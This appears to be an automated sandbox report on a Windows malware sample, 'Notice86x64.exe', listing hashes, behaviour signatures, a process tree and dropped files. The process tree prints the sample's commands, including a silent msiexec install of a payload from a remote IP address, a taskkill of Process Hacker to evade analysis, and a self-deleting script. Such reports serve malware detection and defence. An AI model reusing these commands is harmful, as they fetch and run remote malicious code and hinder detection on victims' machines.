Analysis

  • max time kernel
    108s
  • max time network
    109s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    25/05/2023, 13:09

General

  • Target

    Notice86x64.exe

  • Size

    6.9MB

  • MD5

    bd294af66e42c317ff4bde406043e918

  • SHA1

    c508e4ca273dffca5966cb41f13ec3bb78034108

  • SHA256

    4645c34b63cfe2e839c31994ae00756b38bae0212aceaa8875d69c176e14de3c

  • SHA512

    1e66e6599a6d0b1d9ef1426349bb69e0379997f7d6fbc8f518033062d617af86588c668a8a29841798df2f87566f28834651b9cc57af6e1951eeda432b3fa357

  • SSDEEP

    98304:qSipzN7QKKSW+Aic8vBquYafPwy46kubjHZDMRpSwme6K8VrpPobS+I4:qaSW+Aic8ZqRawhubTiX0etc+I4

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe
    "C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Users\Admin\AppData\Local\Temp\is-5KEKN.tmp\Notice86x64.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-5KEKN.tmp\Notice86x64.tmp" /SL5="$70126,991232,991232,C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1124
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /im processhacker.exe /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im processhacker.exe /f
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:520
      • C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe
        "C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe" /verysilent /sp-
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\Users\Admin\AppData\Local\Temp\is-FAQVT.tmp\Notice86x64.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-FAQVT.tmp\Notice86x64.tmp" /SL5="$80126,991232,991232,C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe" /verysilent /sp-
          4⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1644
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\System32\msiexec.exe" /qn /i http://94.142.138.14/tit/driv.msi
            5⤵
            • Use of msiexec (install) with remote resource
            • Suspicious use of AdjustPrivilegeToken
            PID:668
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\dl.cmd""
            5⤵
            • Deletes itself
            PID:1240
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 63C01B170EB18146295C32E9A43C480E
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        3⤵
        • Modifies file permissions
        PID:1252
      • C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        3⤵
        • Drops file in Windows directory
        PID:876
      • C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\files\x64_t.exe
        "C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\files\x64_t.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Windows\SysWOW64\calc.exe
          calc.exe
          4⤵
            PID:1780
        • C:\Windows\SysWOW64\ICACLS.EXE
          "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\." /SETINTEGRITYLEVEL (CI)(OI)LOW
          3⤵
          • Modifies file permissions
          PID:1136

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\files.cab

      Filesize

      6.1MB

      MD5

      8a28b0f498da8ce64e49c0d565723e6c

      SHA1

      3b9a9e091b3ded7aee959b154418a44380585f82

      SHA256

      1f37853be7f3057c64d3b15e323ee7f9a71390403ecab8f830b6be383dc34241

      SHA512

      f02fbae3514a213af48a25b6c1a183fecfef08f14f50650a5b1a12c26e37a30675d8e541371bd7291b46a0a1b82e9133ea05f8b0cec8d8edf925099bf6a75f89

    • C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\files\x64_t.exe

      Filesize

      6.1MB

      MD5

      9a3bad7d8516216695887acc9668cda1

      SHA1

      a89c097138e5aab1f35b9a03900600057d907690

      SHA256

      4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0

      SHA512

      be94a916846edd622034283852e8b5539b1057f5de2bc30772f4541e90f3fa03992104261f27b78efe0b6bb8880cb3aaba0e2e59e16b85883469dc5a0cddda37

    • C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\files\x64_t.exe

      Filesize

      6.1MB

      MD5

      9a3bad7d8516216695887acc9668cda1

      SHA1

      a89c097138e5aab1f35b9a03900600057d907690

      SHA256

      4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0

      SHA512

      be94a916846edd622034283852e8b5539b1057f5de2bc30772f4541e90f3fa03992104261f27b78efe0b6bb8880cb3aaba0e2e59e16b85883469dc5a0cddda37

    • C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\msiwrapper.ini

      Filesize

      1KB

      MD5

      f4fbe1e35c7052c72fc8df1f87a0ffb9

      SHA1

      bef06e45e4fd528feafee60d918f1a784db3412d

      SHA256

      92a85d5c79025491a15728aadaa76501c203cd42630557d9dc70a687ffc2ace4

      SHA512

      dafd409268863e11f5bc83fcfea593c6bab698df9d10d1d658a76aa8e3fdd314ebd14e73106f387fe17658e92608753d633b9bf3c5c993ae06e22812caca20e0

    • C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\msiwrapper.ini

      Filesize

      1KB

      MD5

      f4fbe1e35c7052c72fc8df1f87a0ffb9

      SHA1

      bef06e45e4fd528feafee60d918f1a784db3412d

      SHA256

      92a85d5c79025491a15728aadaa76501c203cd42630557d9dc70a687ffc2ace4

      SHA512

      dafd409268863e11f5bc83fcfea593c6bab698df9d10d1d658a76aa8e3fdd314ebd14e73106f387fe17658e92608753d633b9bf3c5c993ae06e22812caca20e0

    • C:\Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\msiwrapper.ini

      Filesize

      1KB

      MD5

      b4c6c5cc770d952cd2e7c7bdce497a77

      SHA1

      3f93c0f135c344b762ac75a317a737d21e7bc98a

      SHA256

      ee4eb5568e0209b10c7b1c5965b2a560743615b0ff26e6441bf67103e6953658

      SHA512

      48636226d57e7fd0135e2f8915689a5e6161252d54276dc87496b5335e69054f7785113470b26f8ebcad95cdcb2863e883f79116114d739247bc24887f0ac3e1

    • C:\Users\Admin\AppData\Local\Temp\dl.cmd

      Filesize

      144B

      MD5

      ecb0fdb16b35747e7f77642c4c4a8520

      SHA1

      57b93f1ff87b0d46846f316dbb2754a6ba18d60d

      SHA256

      4a268df350447ea28f13d8b307dc3f70d1a5ca85c75673e95c8a3dafd9f2ea16

      SHA512

      293baa8858a7635a679dd820fca2c054f41e7d9498d69eca07707c47083d31f3e07a392c9b2c6535e79a2cf82a6d293b549447433b3a44d0dcc9dbe10dc80218

    • C:\Users\Admin\AppData\Local\Temp\is-5KEKN.tmp\Notice86x64.tmp

      Filesize

      3.1MB

      MD5

      655b822ebcb631eaeb14b90aac2a4a5d

      SHA1

      8d18301d578769bf8316733a95176dc117e2d278

      SHA256

      63a18a443c7b6489b4aaf393b2b3369ef9597a50834f90a844de1005d845d487

      SHA512

      6d09140eb8329eeb8de5d67055d2234689685156fc302e77707490a8d2c10ae49582bfe31c5e358d2d3d4859e0f4babab5a74461abb8d9351c0b6cf52792c49f

    • C:\Users\Admin\AppData\Local\Temp\is-FAQVT.tmp\Notice86x64.tmp

      Filesize

      3.1MB

      MD5

      655b822ebcb631eaeb14b90aac2a4a5d

      SHA1

      8d18301d578769bf8316733a95176dc117e2d278

      SHA256

      63a18a443c7b6489b4aaf393b2b3369ef9597a50834f90a844de1005d845d487

      SHA512

      6d09140eb8329eeb8de5d67055d2234689685156fc302e77707490a8d2c10ae49582bfe31c5e358d2d3d4859e0f4babab5a74461abb8d9351c0b6cf52792c49f

    • C:\Users\Admin\AppData\Local\Temp\is-FAQVT.tmp\Notice86x64.tmp

      Filesize

      3.1MB

      MD5

      655b822ebcb631eaeb14b90aac2a4a5d

      SHA1

      8d18301d578769bf8316733a95176dc117e2d278

      SHA256

      63a18a443c7b6489b4aaf393b2b3369ef9597a50834f90a844de1005d845d487

      SHA512

      6d09140eb8329eeb8de5d67055d2234689685156fc302e77707490a8d2c10ae49582bfe31c5e358d2d3d4859e0f4babab5a74461abb8d9351c0b6cf52792c49f

    • C:\Windows\Installer\MSI427D.tmp

      Filesize

      6.5MB

      MD5

      b145881a72eb895a237945b6f37f87b3

      SHA1

      d7a075762597df5984bbdfd47808d4e13776fe17

      SHA256

      394a101a13792aa062a2f8dbb7f8f1cc2b7b5e9ea0fc0e57f40197dfc525639a

      SHA512

      87c2663e5022aedd9baf4b8b0f45e4c1d86cdde16bb81ac766d0a7515a2870381a41e8cd2ca2f16c141e6c716a3c4d233b6692a082bc109414056c69fdcc3b48

    • C:\Windows\Installer\MSI5025.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • C:\Windows\Installer\MSI607C.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • \Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\files\x64_t.exe

      Filesize

      6.1MB

      MD5

      9a3bad7d8516216695887acc9668cda1

      SHA1

      a89c097138e5aab1f35b9a03900600057d907690

      SHA256

      4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0

      SHA512

      be94a916846edd622034283852e8b5539b1057f5de2bc30772f4541e90f3fa03992104261f27b78efe0b6bb8880cb3aaba0e2e59e16b85883469dc5a0cddda37

    • \Users\Admin\AppData\Local\Temp\MW-cfbb4ca5-4a9d-483a-a158-9e473a47a958\files\x64_t.exe

      Filesize

      6.1MB

      MD5

      9a3bad7d8516216695887acc9668cda1

      SHA1

      a89c097138e5aab1f35b9a03900600057d907690

      SHA256

      4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0

      SHA512

      be94a916846edd622034283852e8b5539b1057f5de2bc30772f4541e90f3fa03992104261f27b78efe0b6bb8880cb3aaba0e2e59e16b85883469dc5a0cddda37

    • \Users\Admin\AppData\Local\Temp\is-5KEKN.tmp\Notice86x64.tmp

      Filesize

      3.1MB

      MD5

      655b822ebcb631eaeb14b90aac2a4a5d

      SHA1

      8d18301d578769bf8316733a95176dc117e2d278

      SHA256

      63a18a443c7b6489b4aaf393b2b3369ef9597a50834f90a844de1005d845d487

      SHA512

      6d09140eb8329eeb8de5d67055d2234689685156fc302e77707490a8d2c10ae49582bfe31c5e358d2d3d4859e0f4babab5a74461abb8d9351c0b6cf52792c49f

    • \Users\Admin\AppData\Local\Temp\is-FAQVT.tmp\Notice86x64.tmp

      Filesize

      3.1MB

      MD5

      655b822ebcb631eaeb14b90aac2a4a5d

      SHA1

      8d18301d578769bf8316733a95176dc117e2d278

      SHA256

      63a18a443c7b6489b4aaf393b2b3369ef9597a50834f90a844de1005d845d487

      SHA512

      6d09140eb8329eeb8de5d67055d2234689685156fc302e77707490a8d2c10ae49582bfe31c5e358d2d3d4859e0f4babab5a74461abb8d9351c0b6cf52792c49f

    • \Windows\Installer\MSI5025.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • \Windows\Installer\MSI607C.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • memory/1124-66-0x0000000000400000-0x000000000072D000-memory.dmp

      Filesize

      3.2MB

    • memory/1124-62-0x0000000000240000-0x0000000000241000-memory.dmp

      Filesize

      4KB

    • memory/1344-68-0x0000000000400000-0x00000000004FF000-memory.dmp

      Filesize

      1020KB

    • memory/1344-54-0x0000000000400000-0x00000000004FF000-memory.dmp

      Filesize

      1020KB

    • memory/1496-81-0x0000000000400000-0x00000000004FF000-memory.dmp

      Filesize

      1020KB

    • memory/1496-64-0x0000000000400000-0x00000000004FF000-memory.dmp

      Filesize

      1020KB

    • memory/1644-78-0x0000000000400000-0x000000000072D000-memory.dmp

      Filesize

      3.2MB

    • memory/1644-74-0x0000000000240000-0x0000000000241000-memory.dmp

      Filesize

      4KB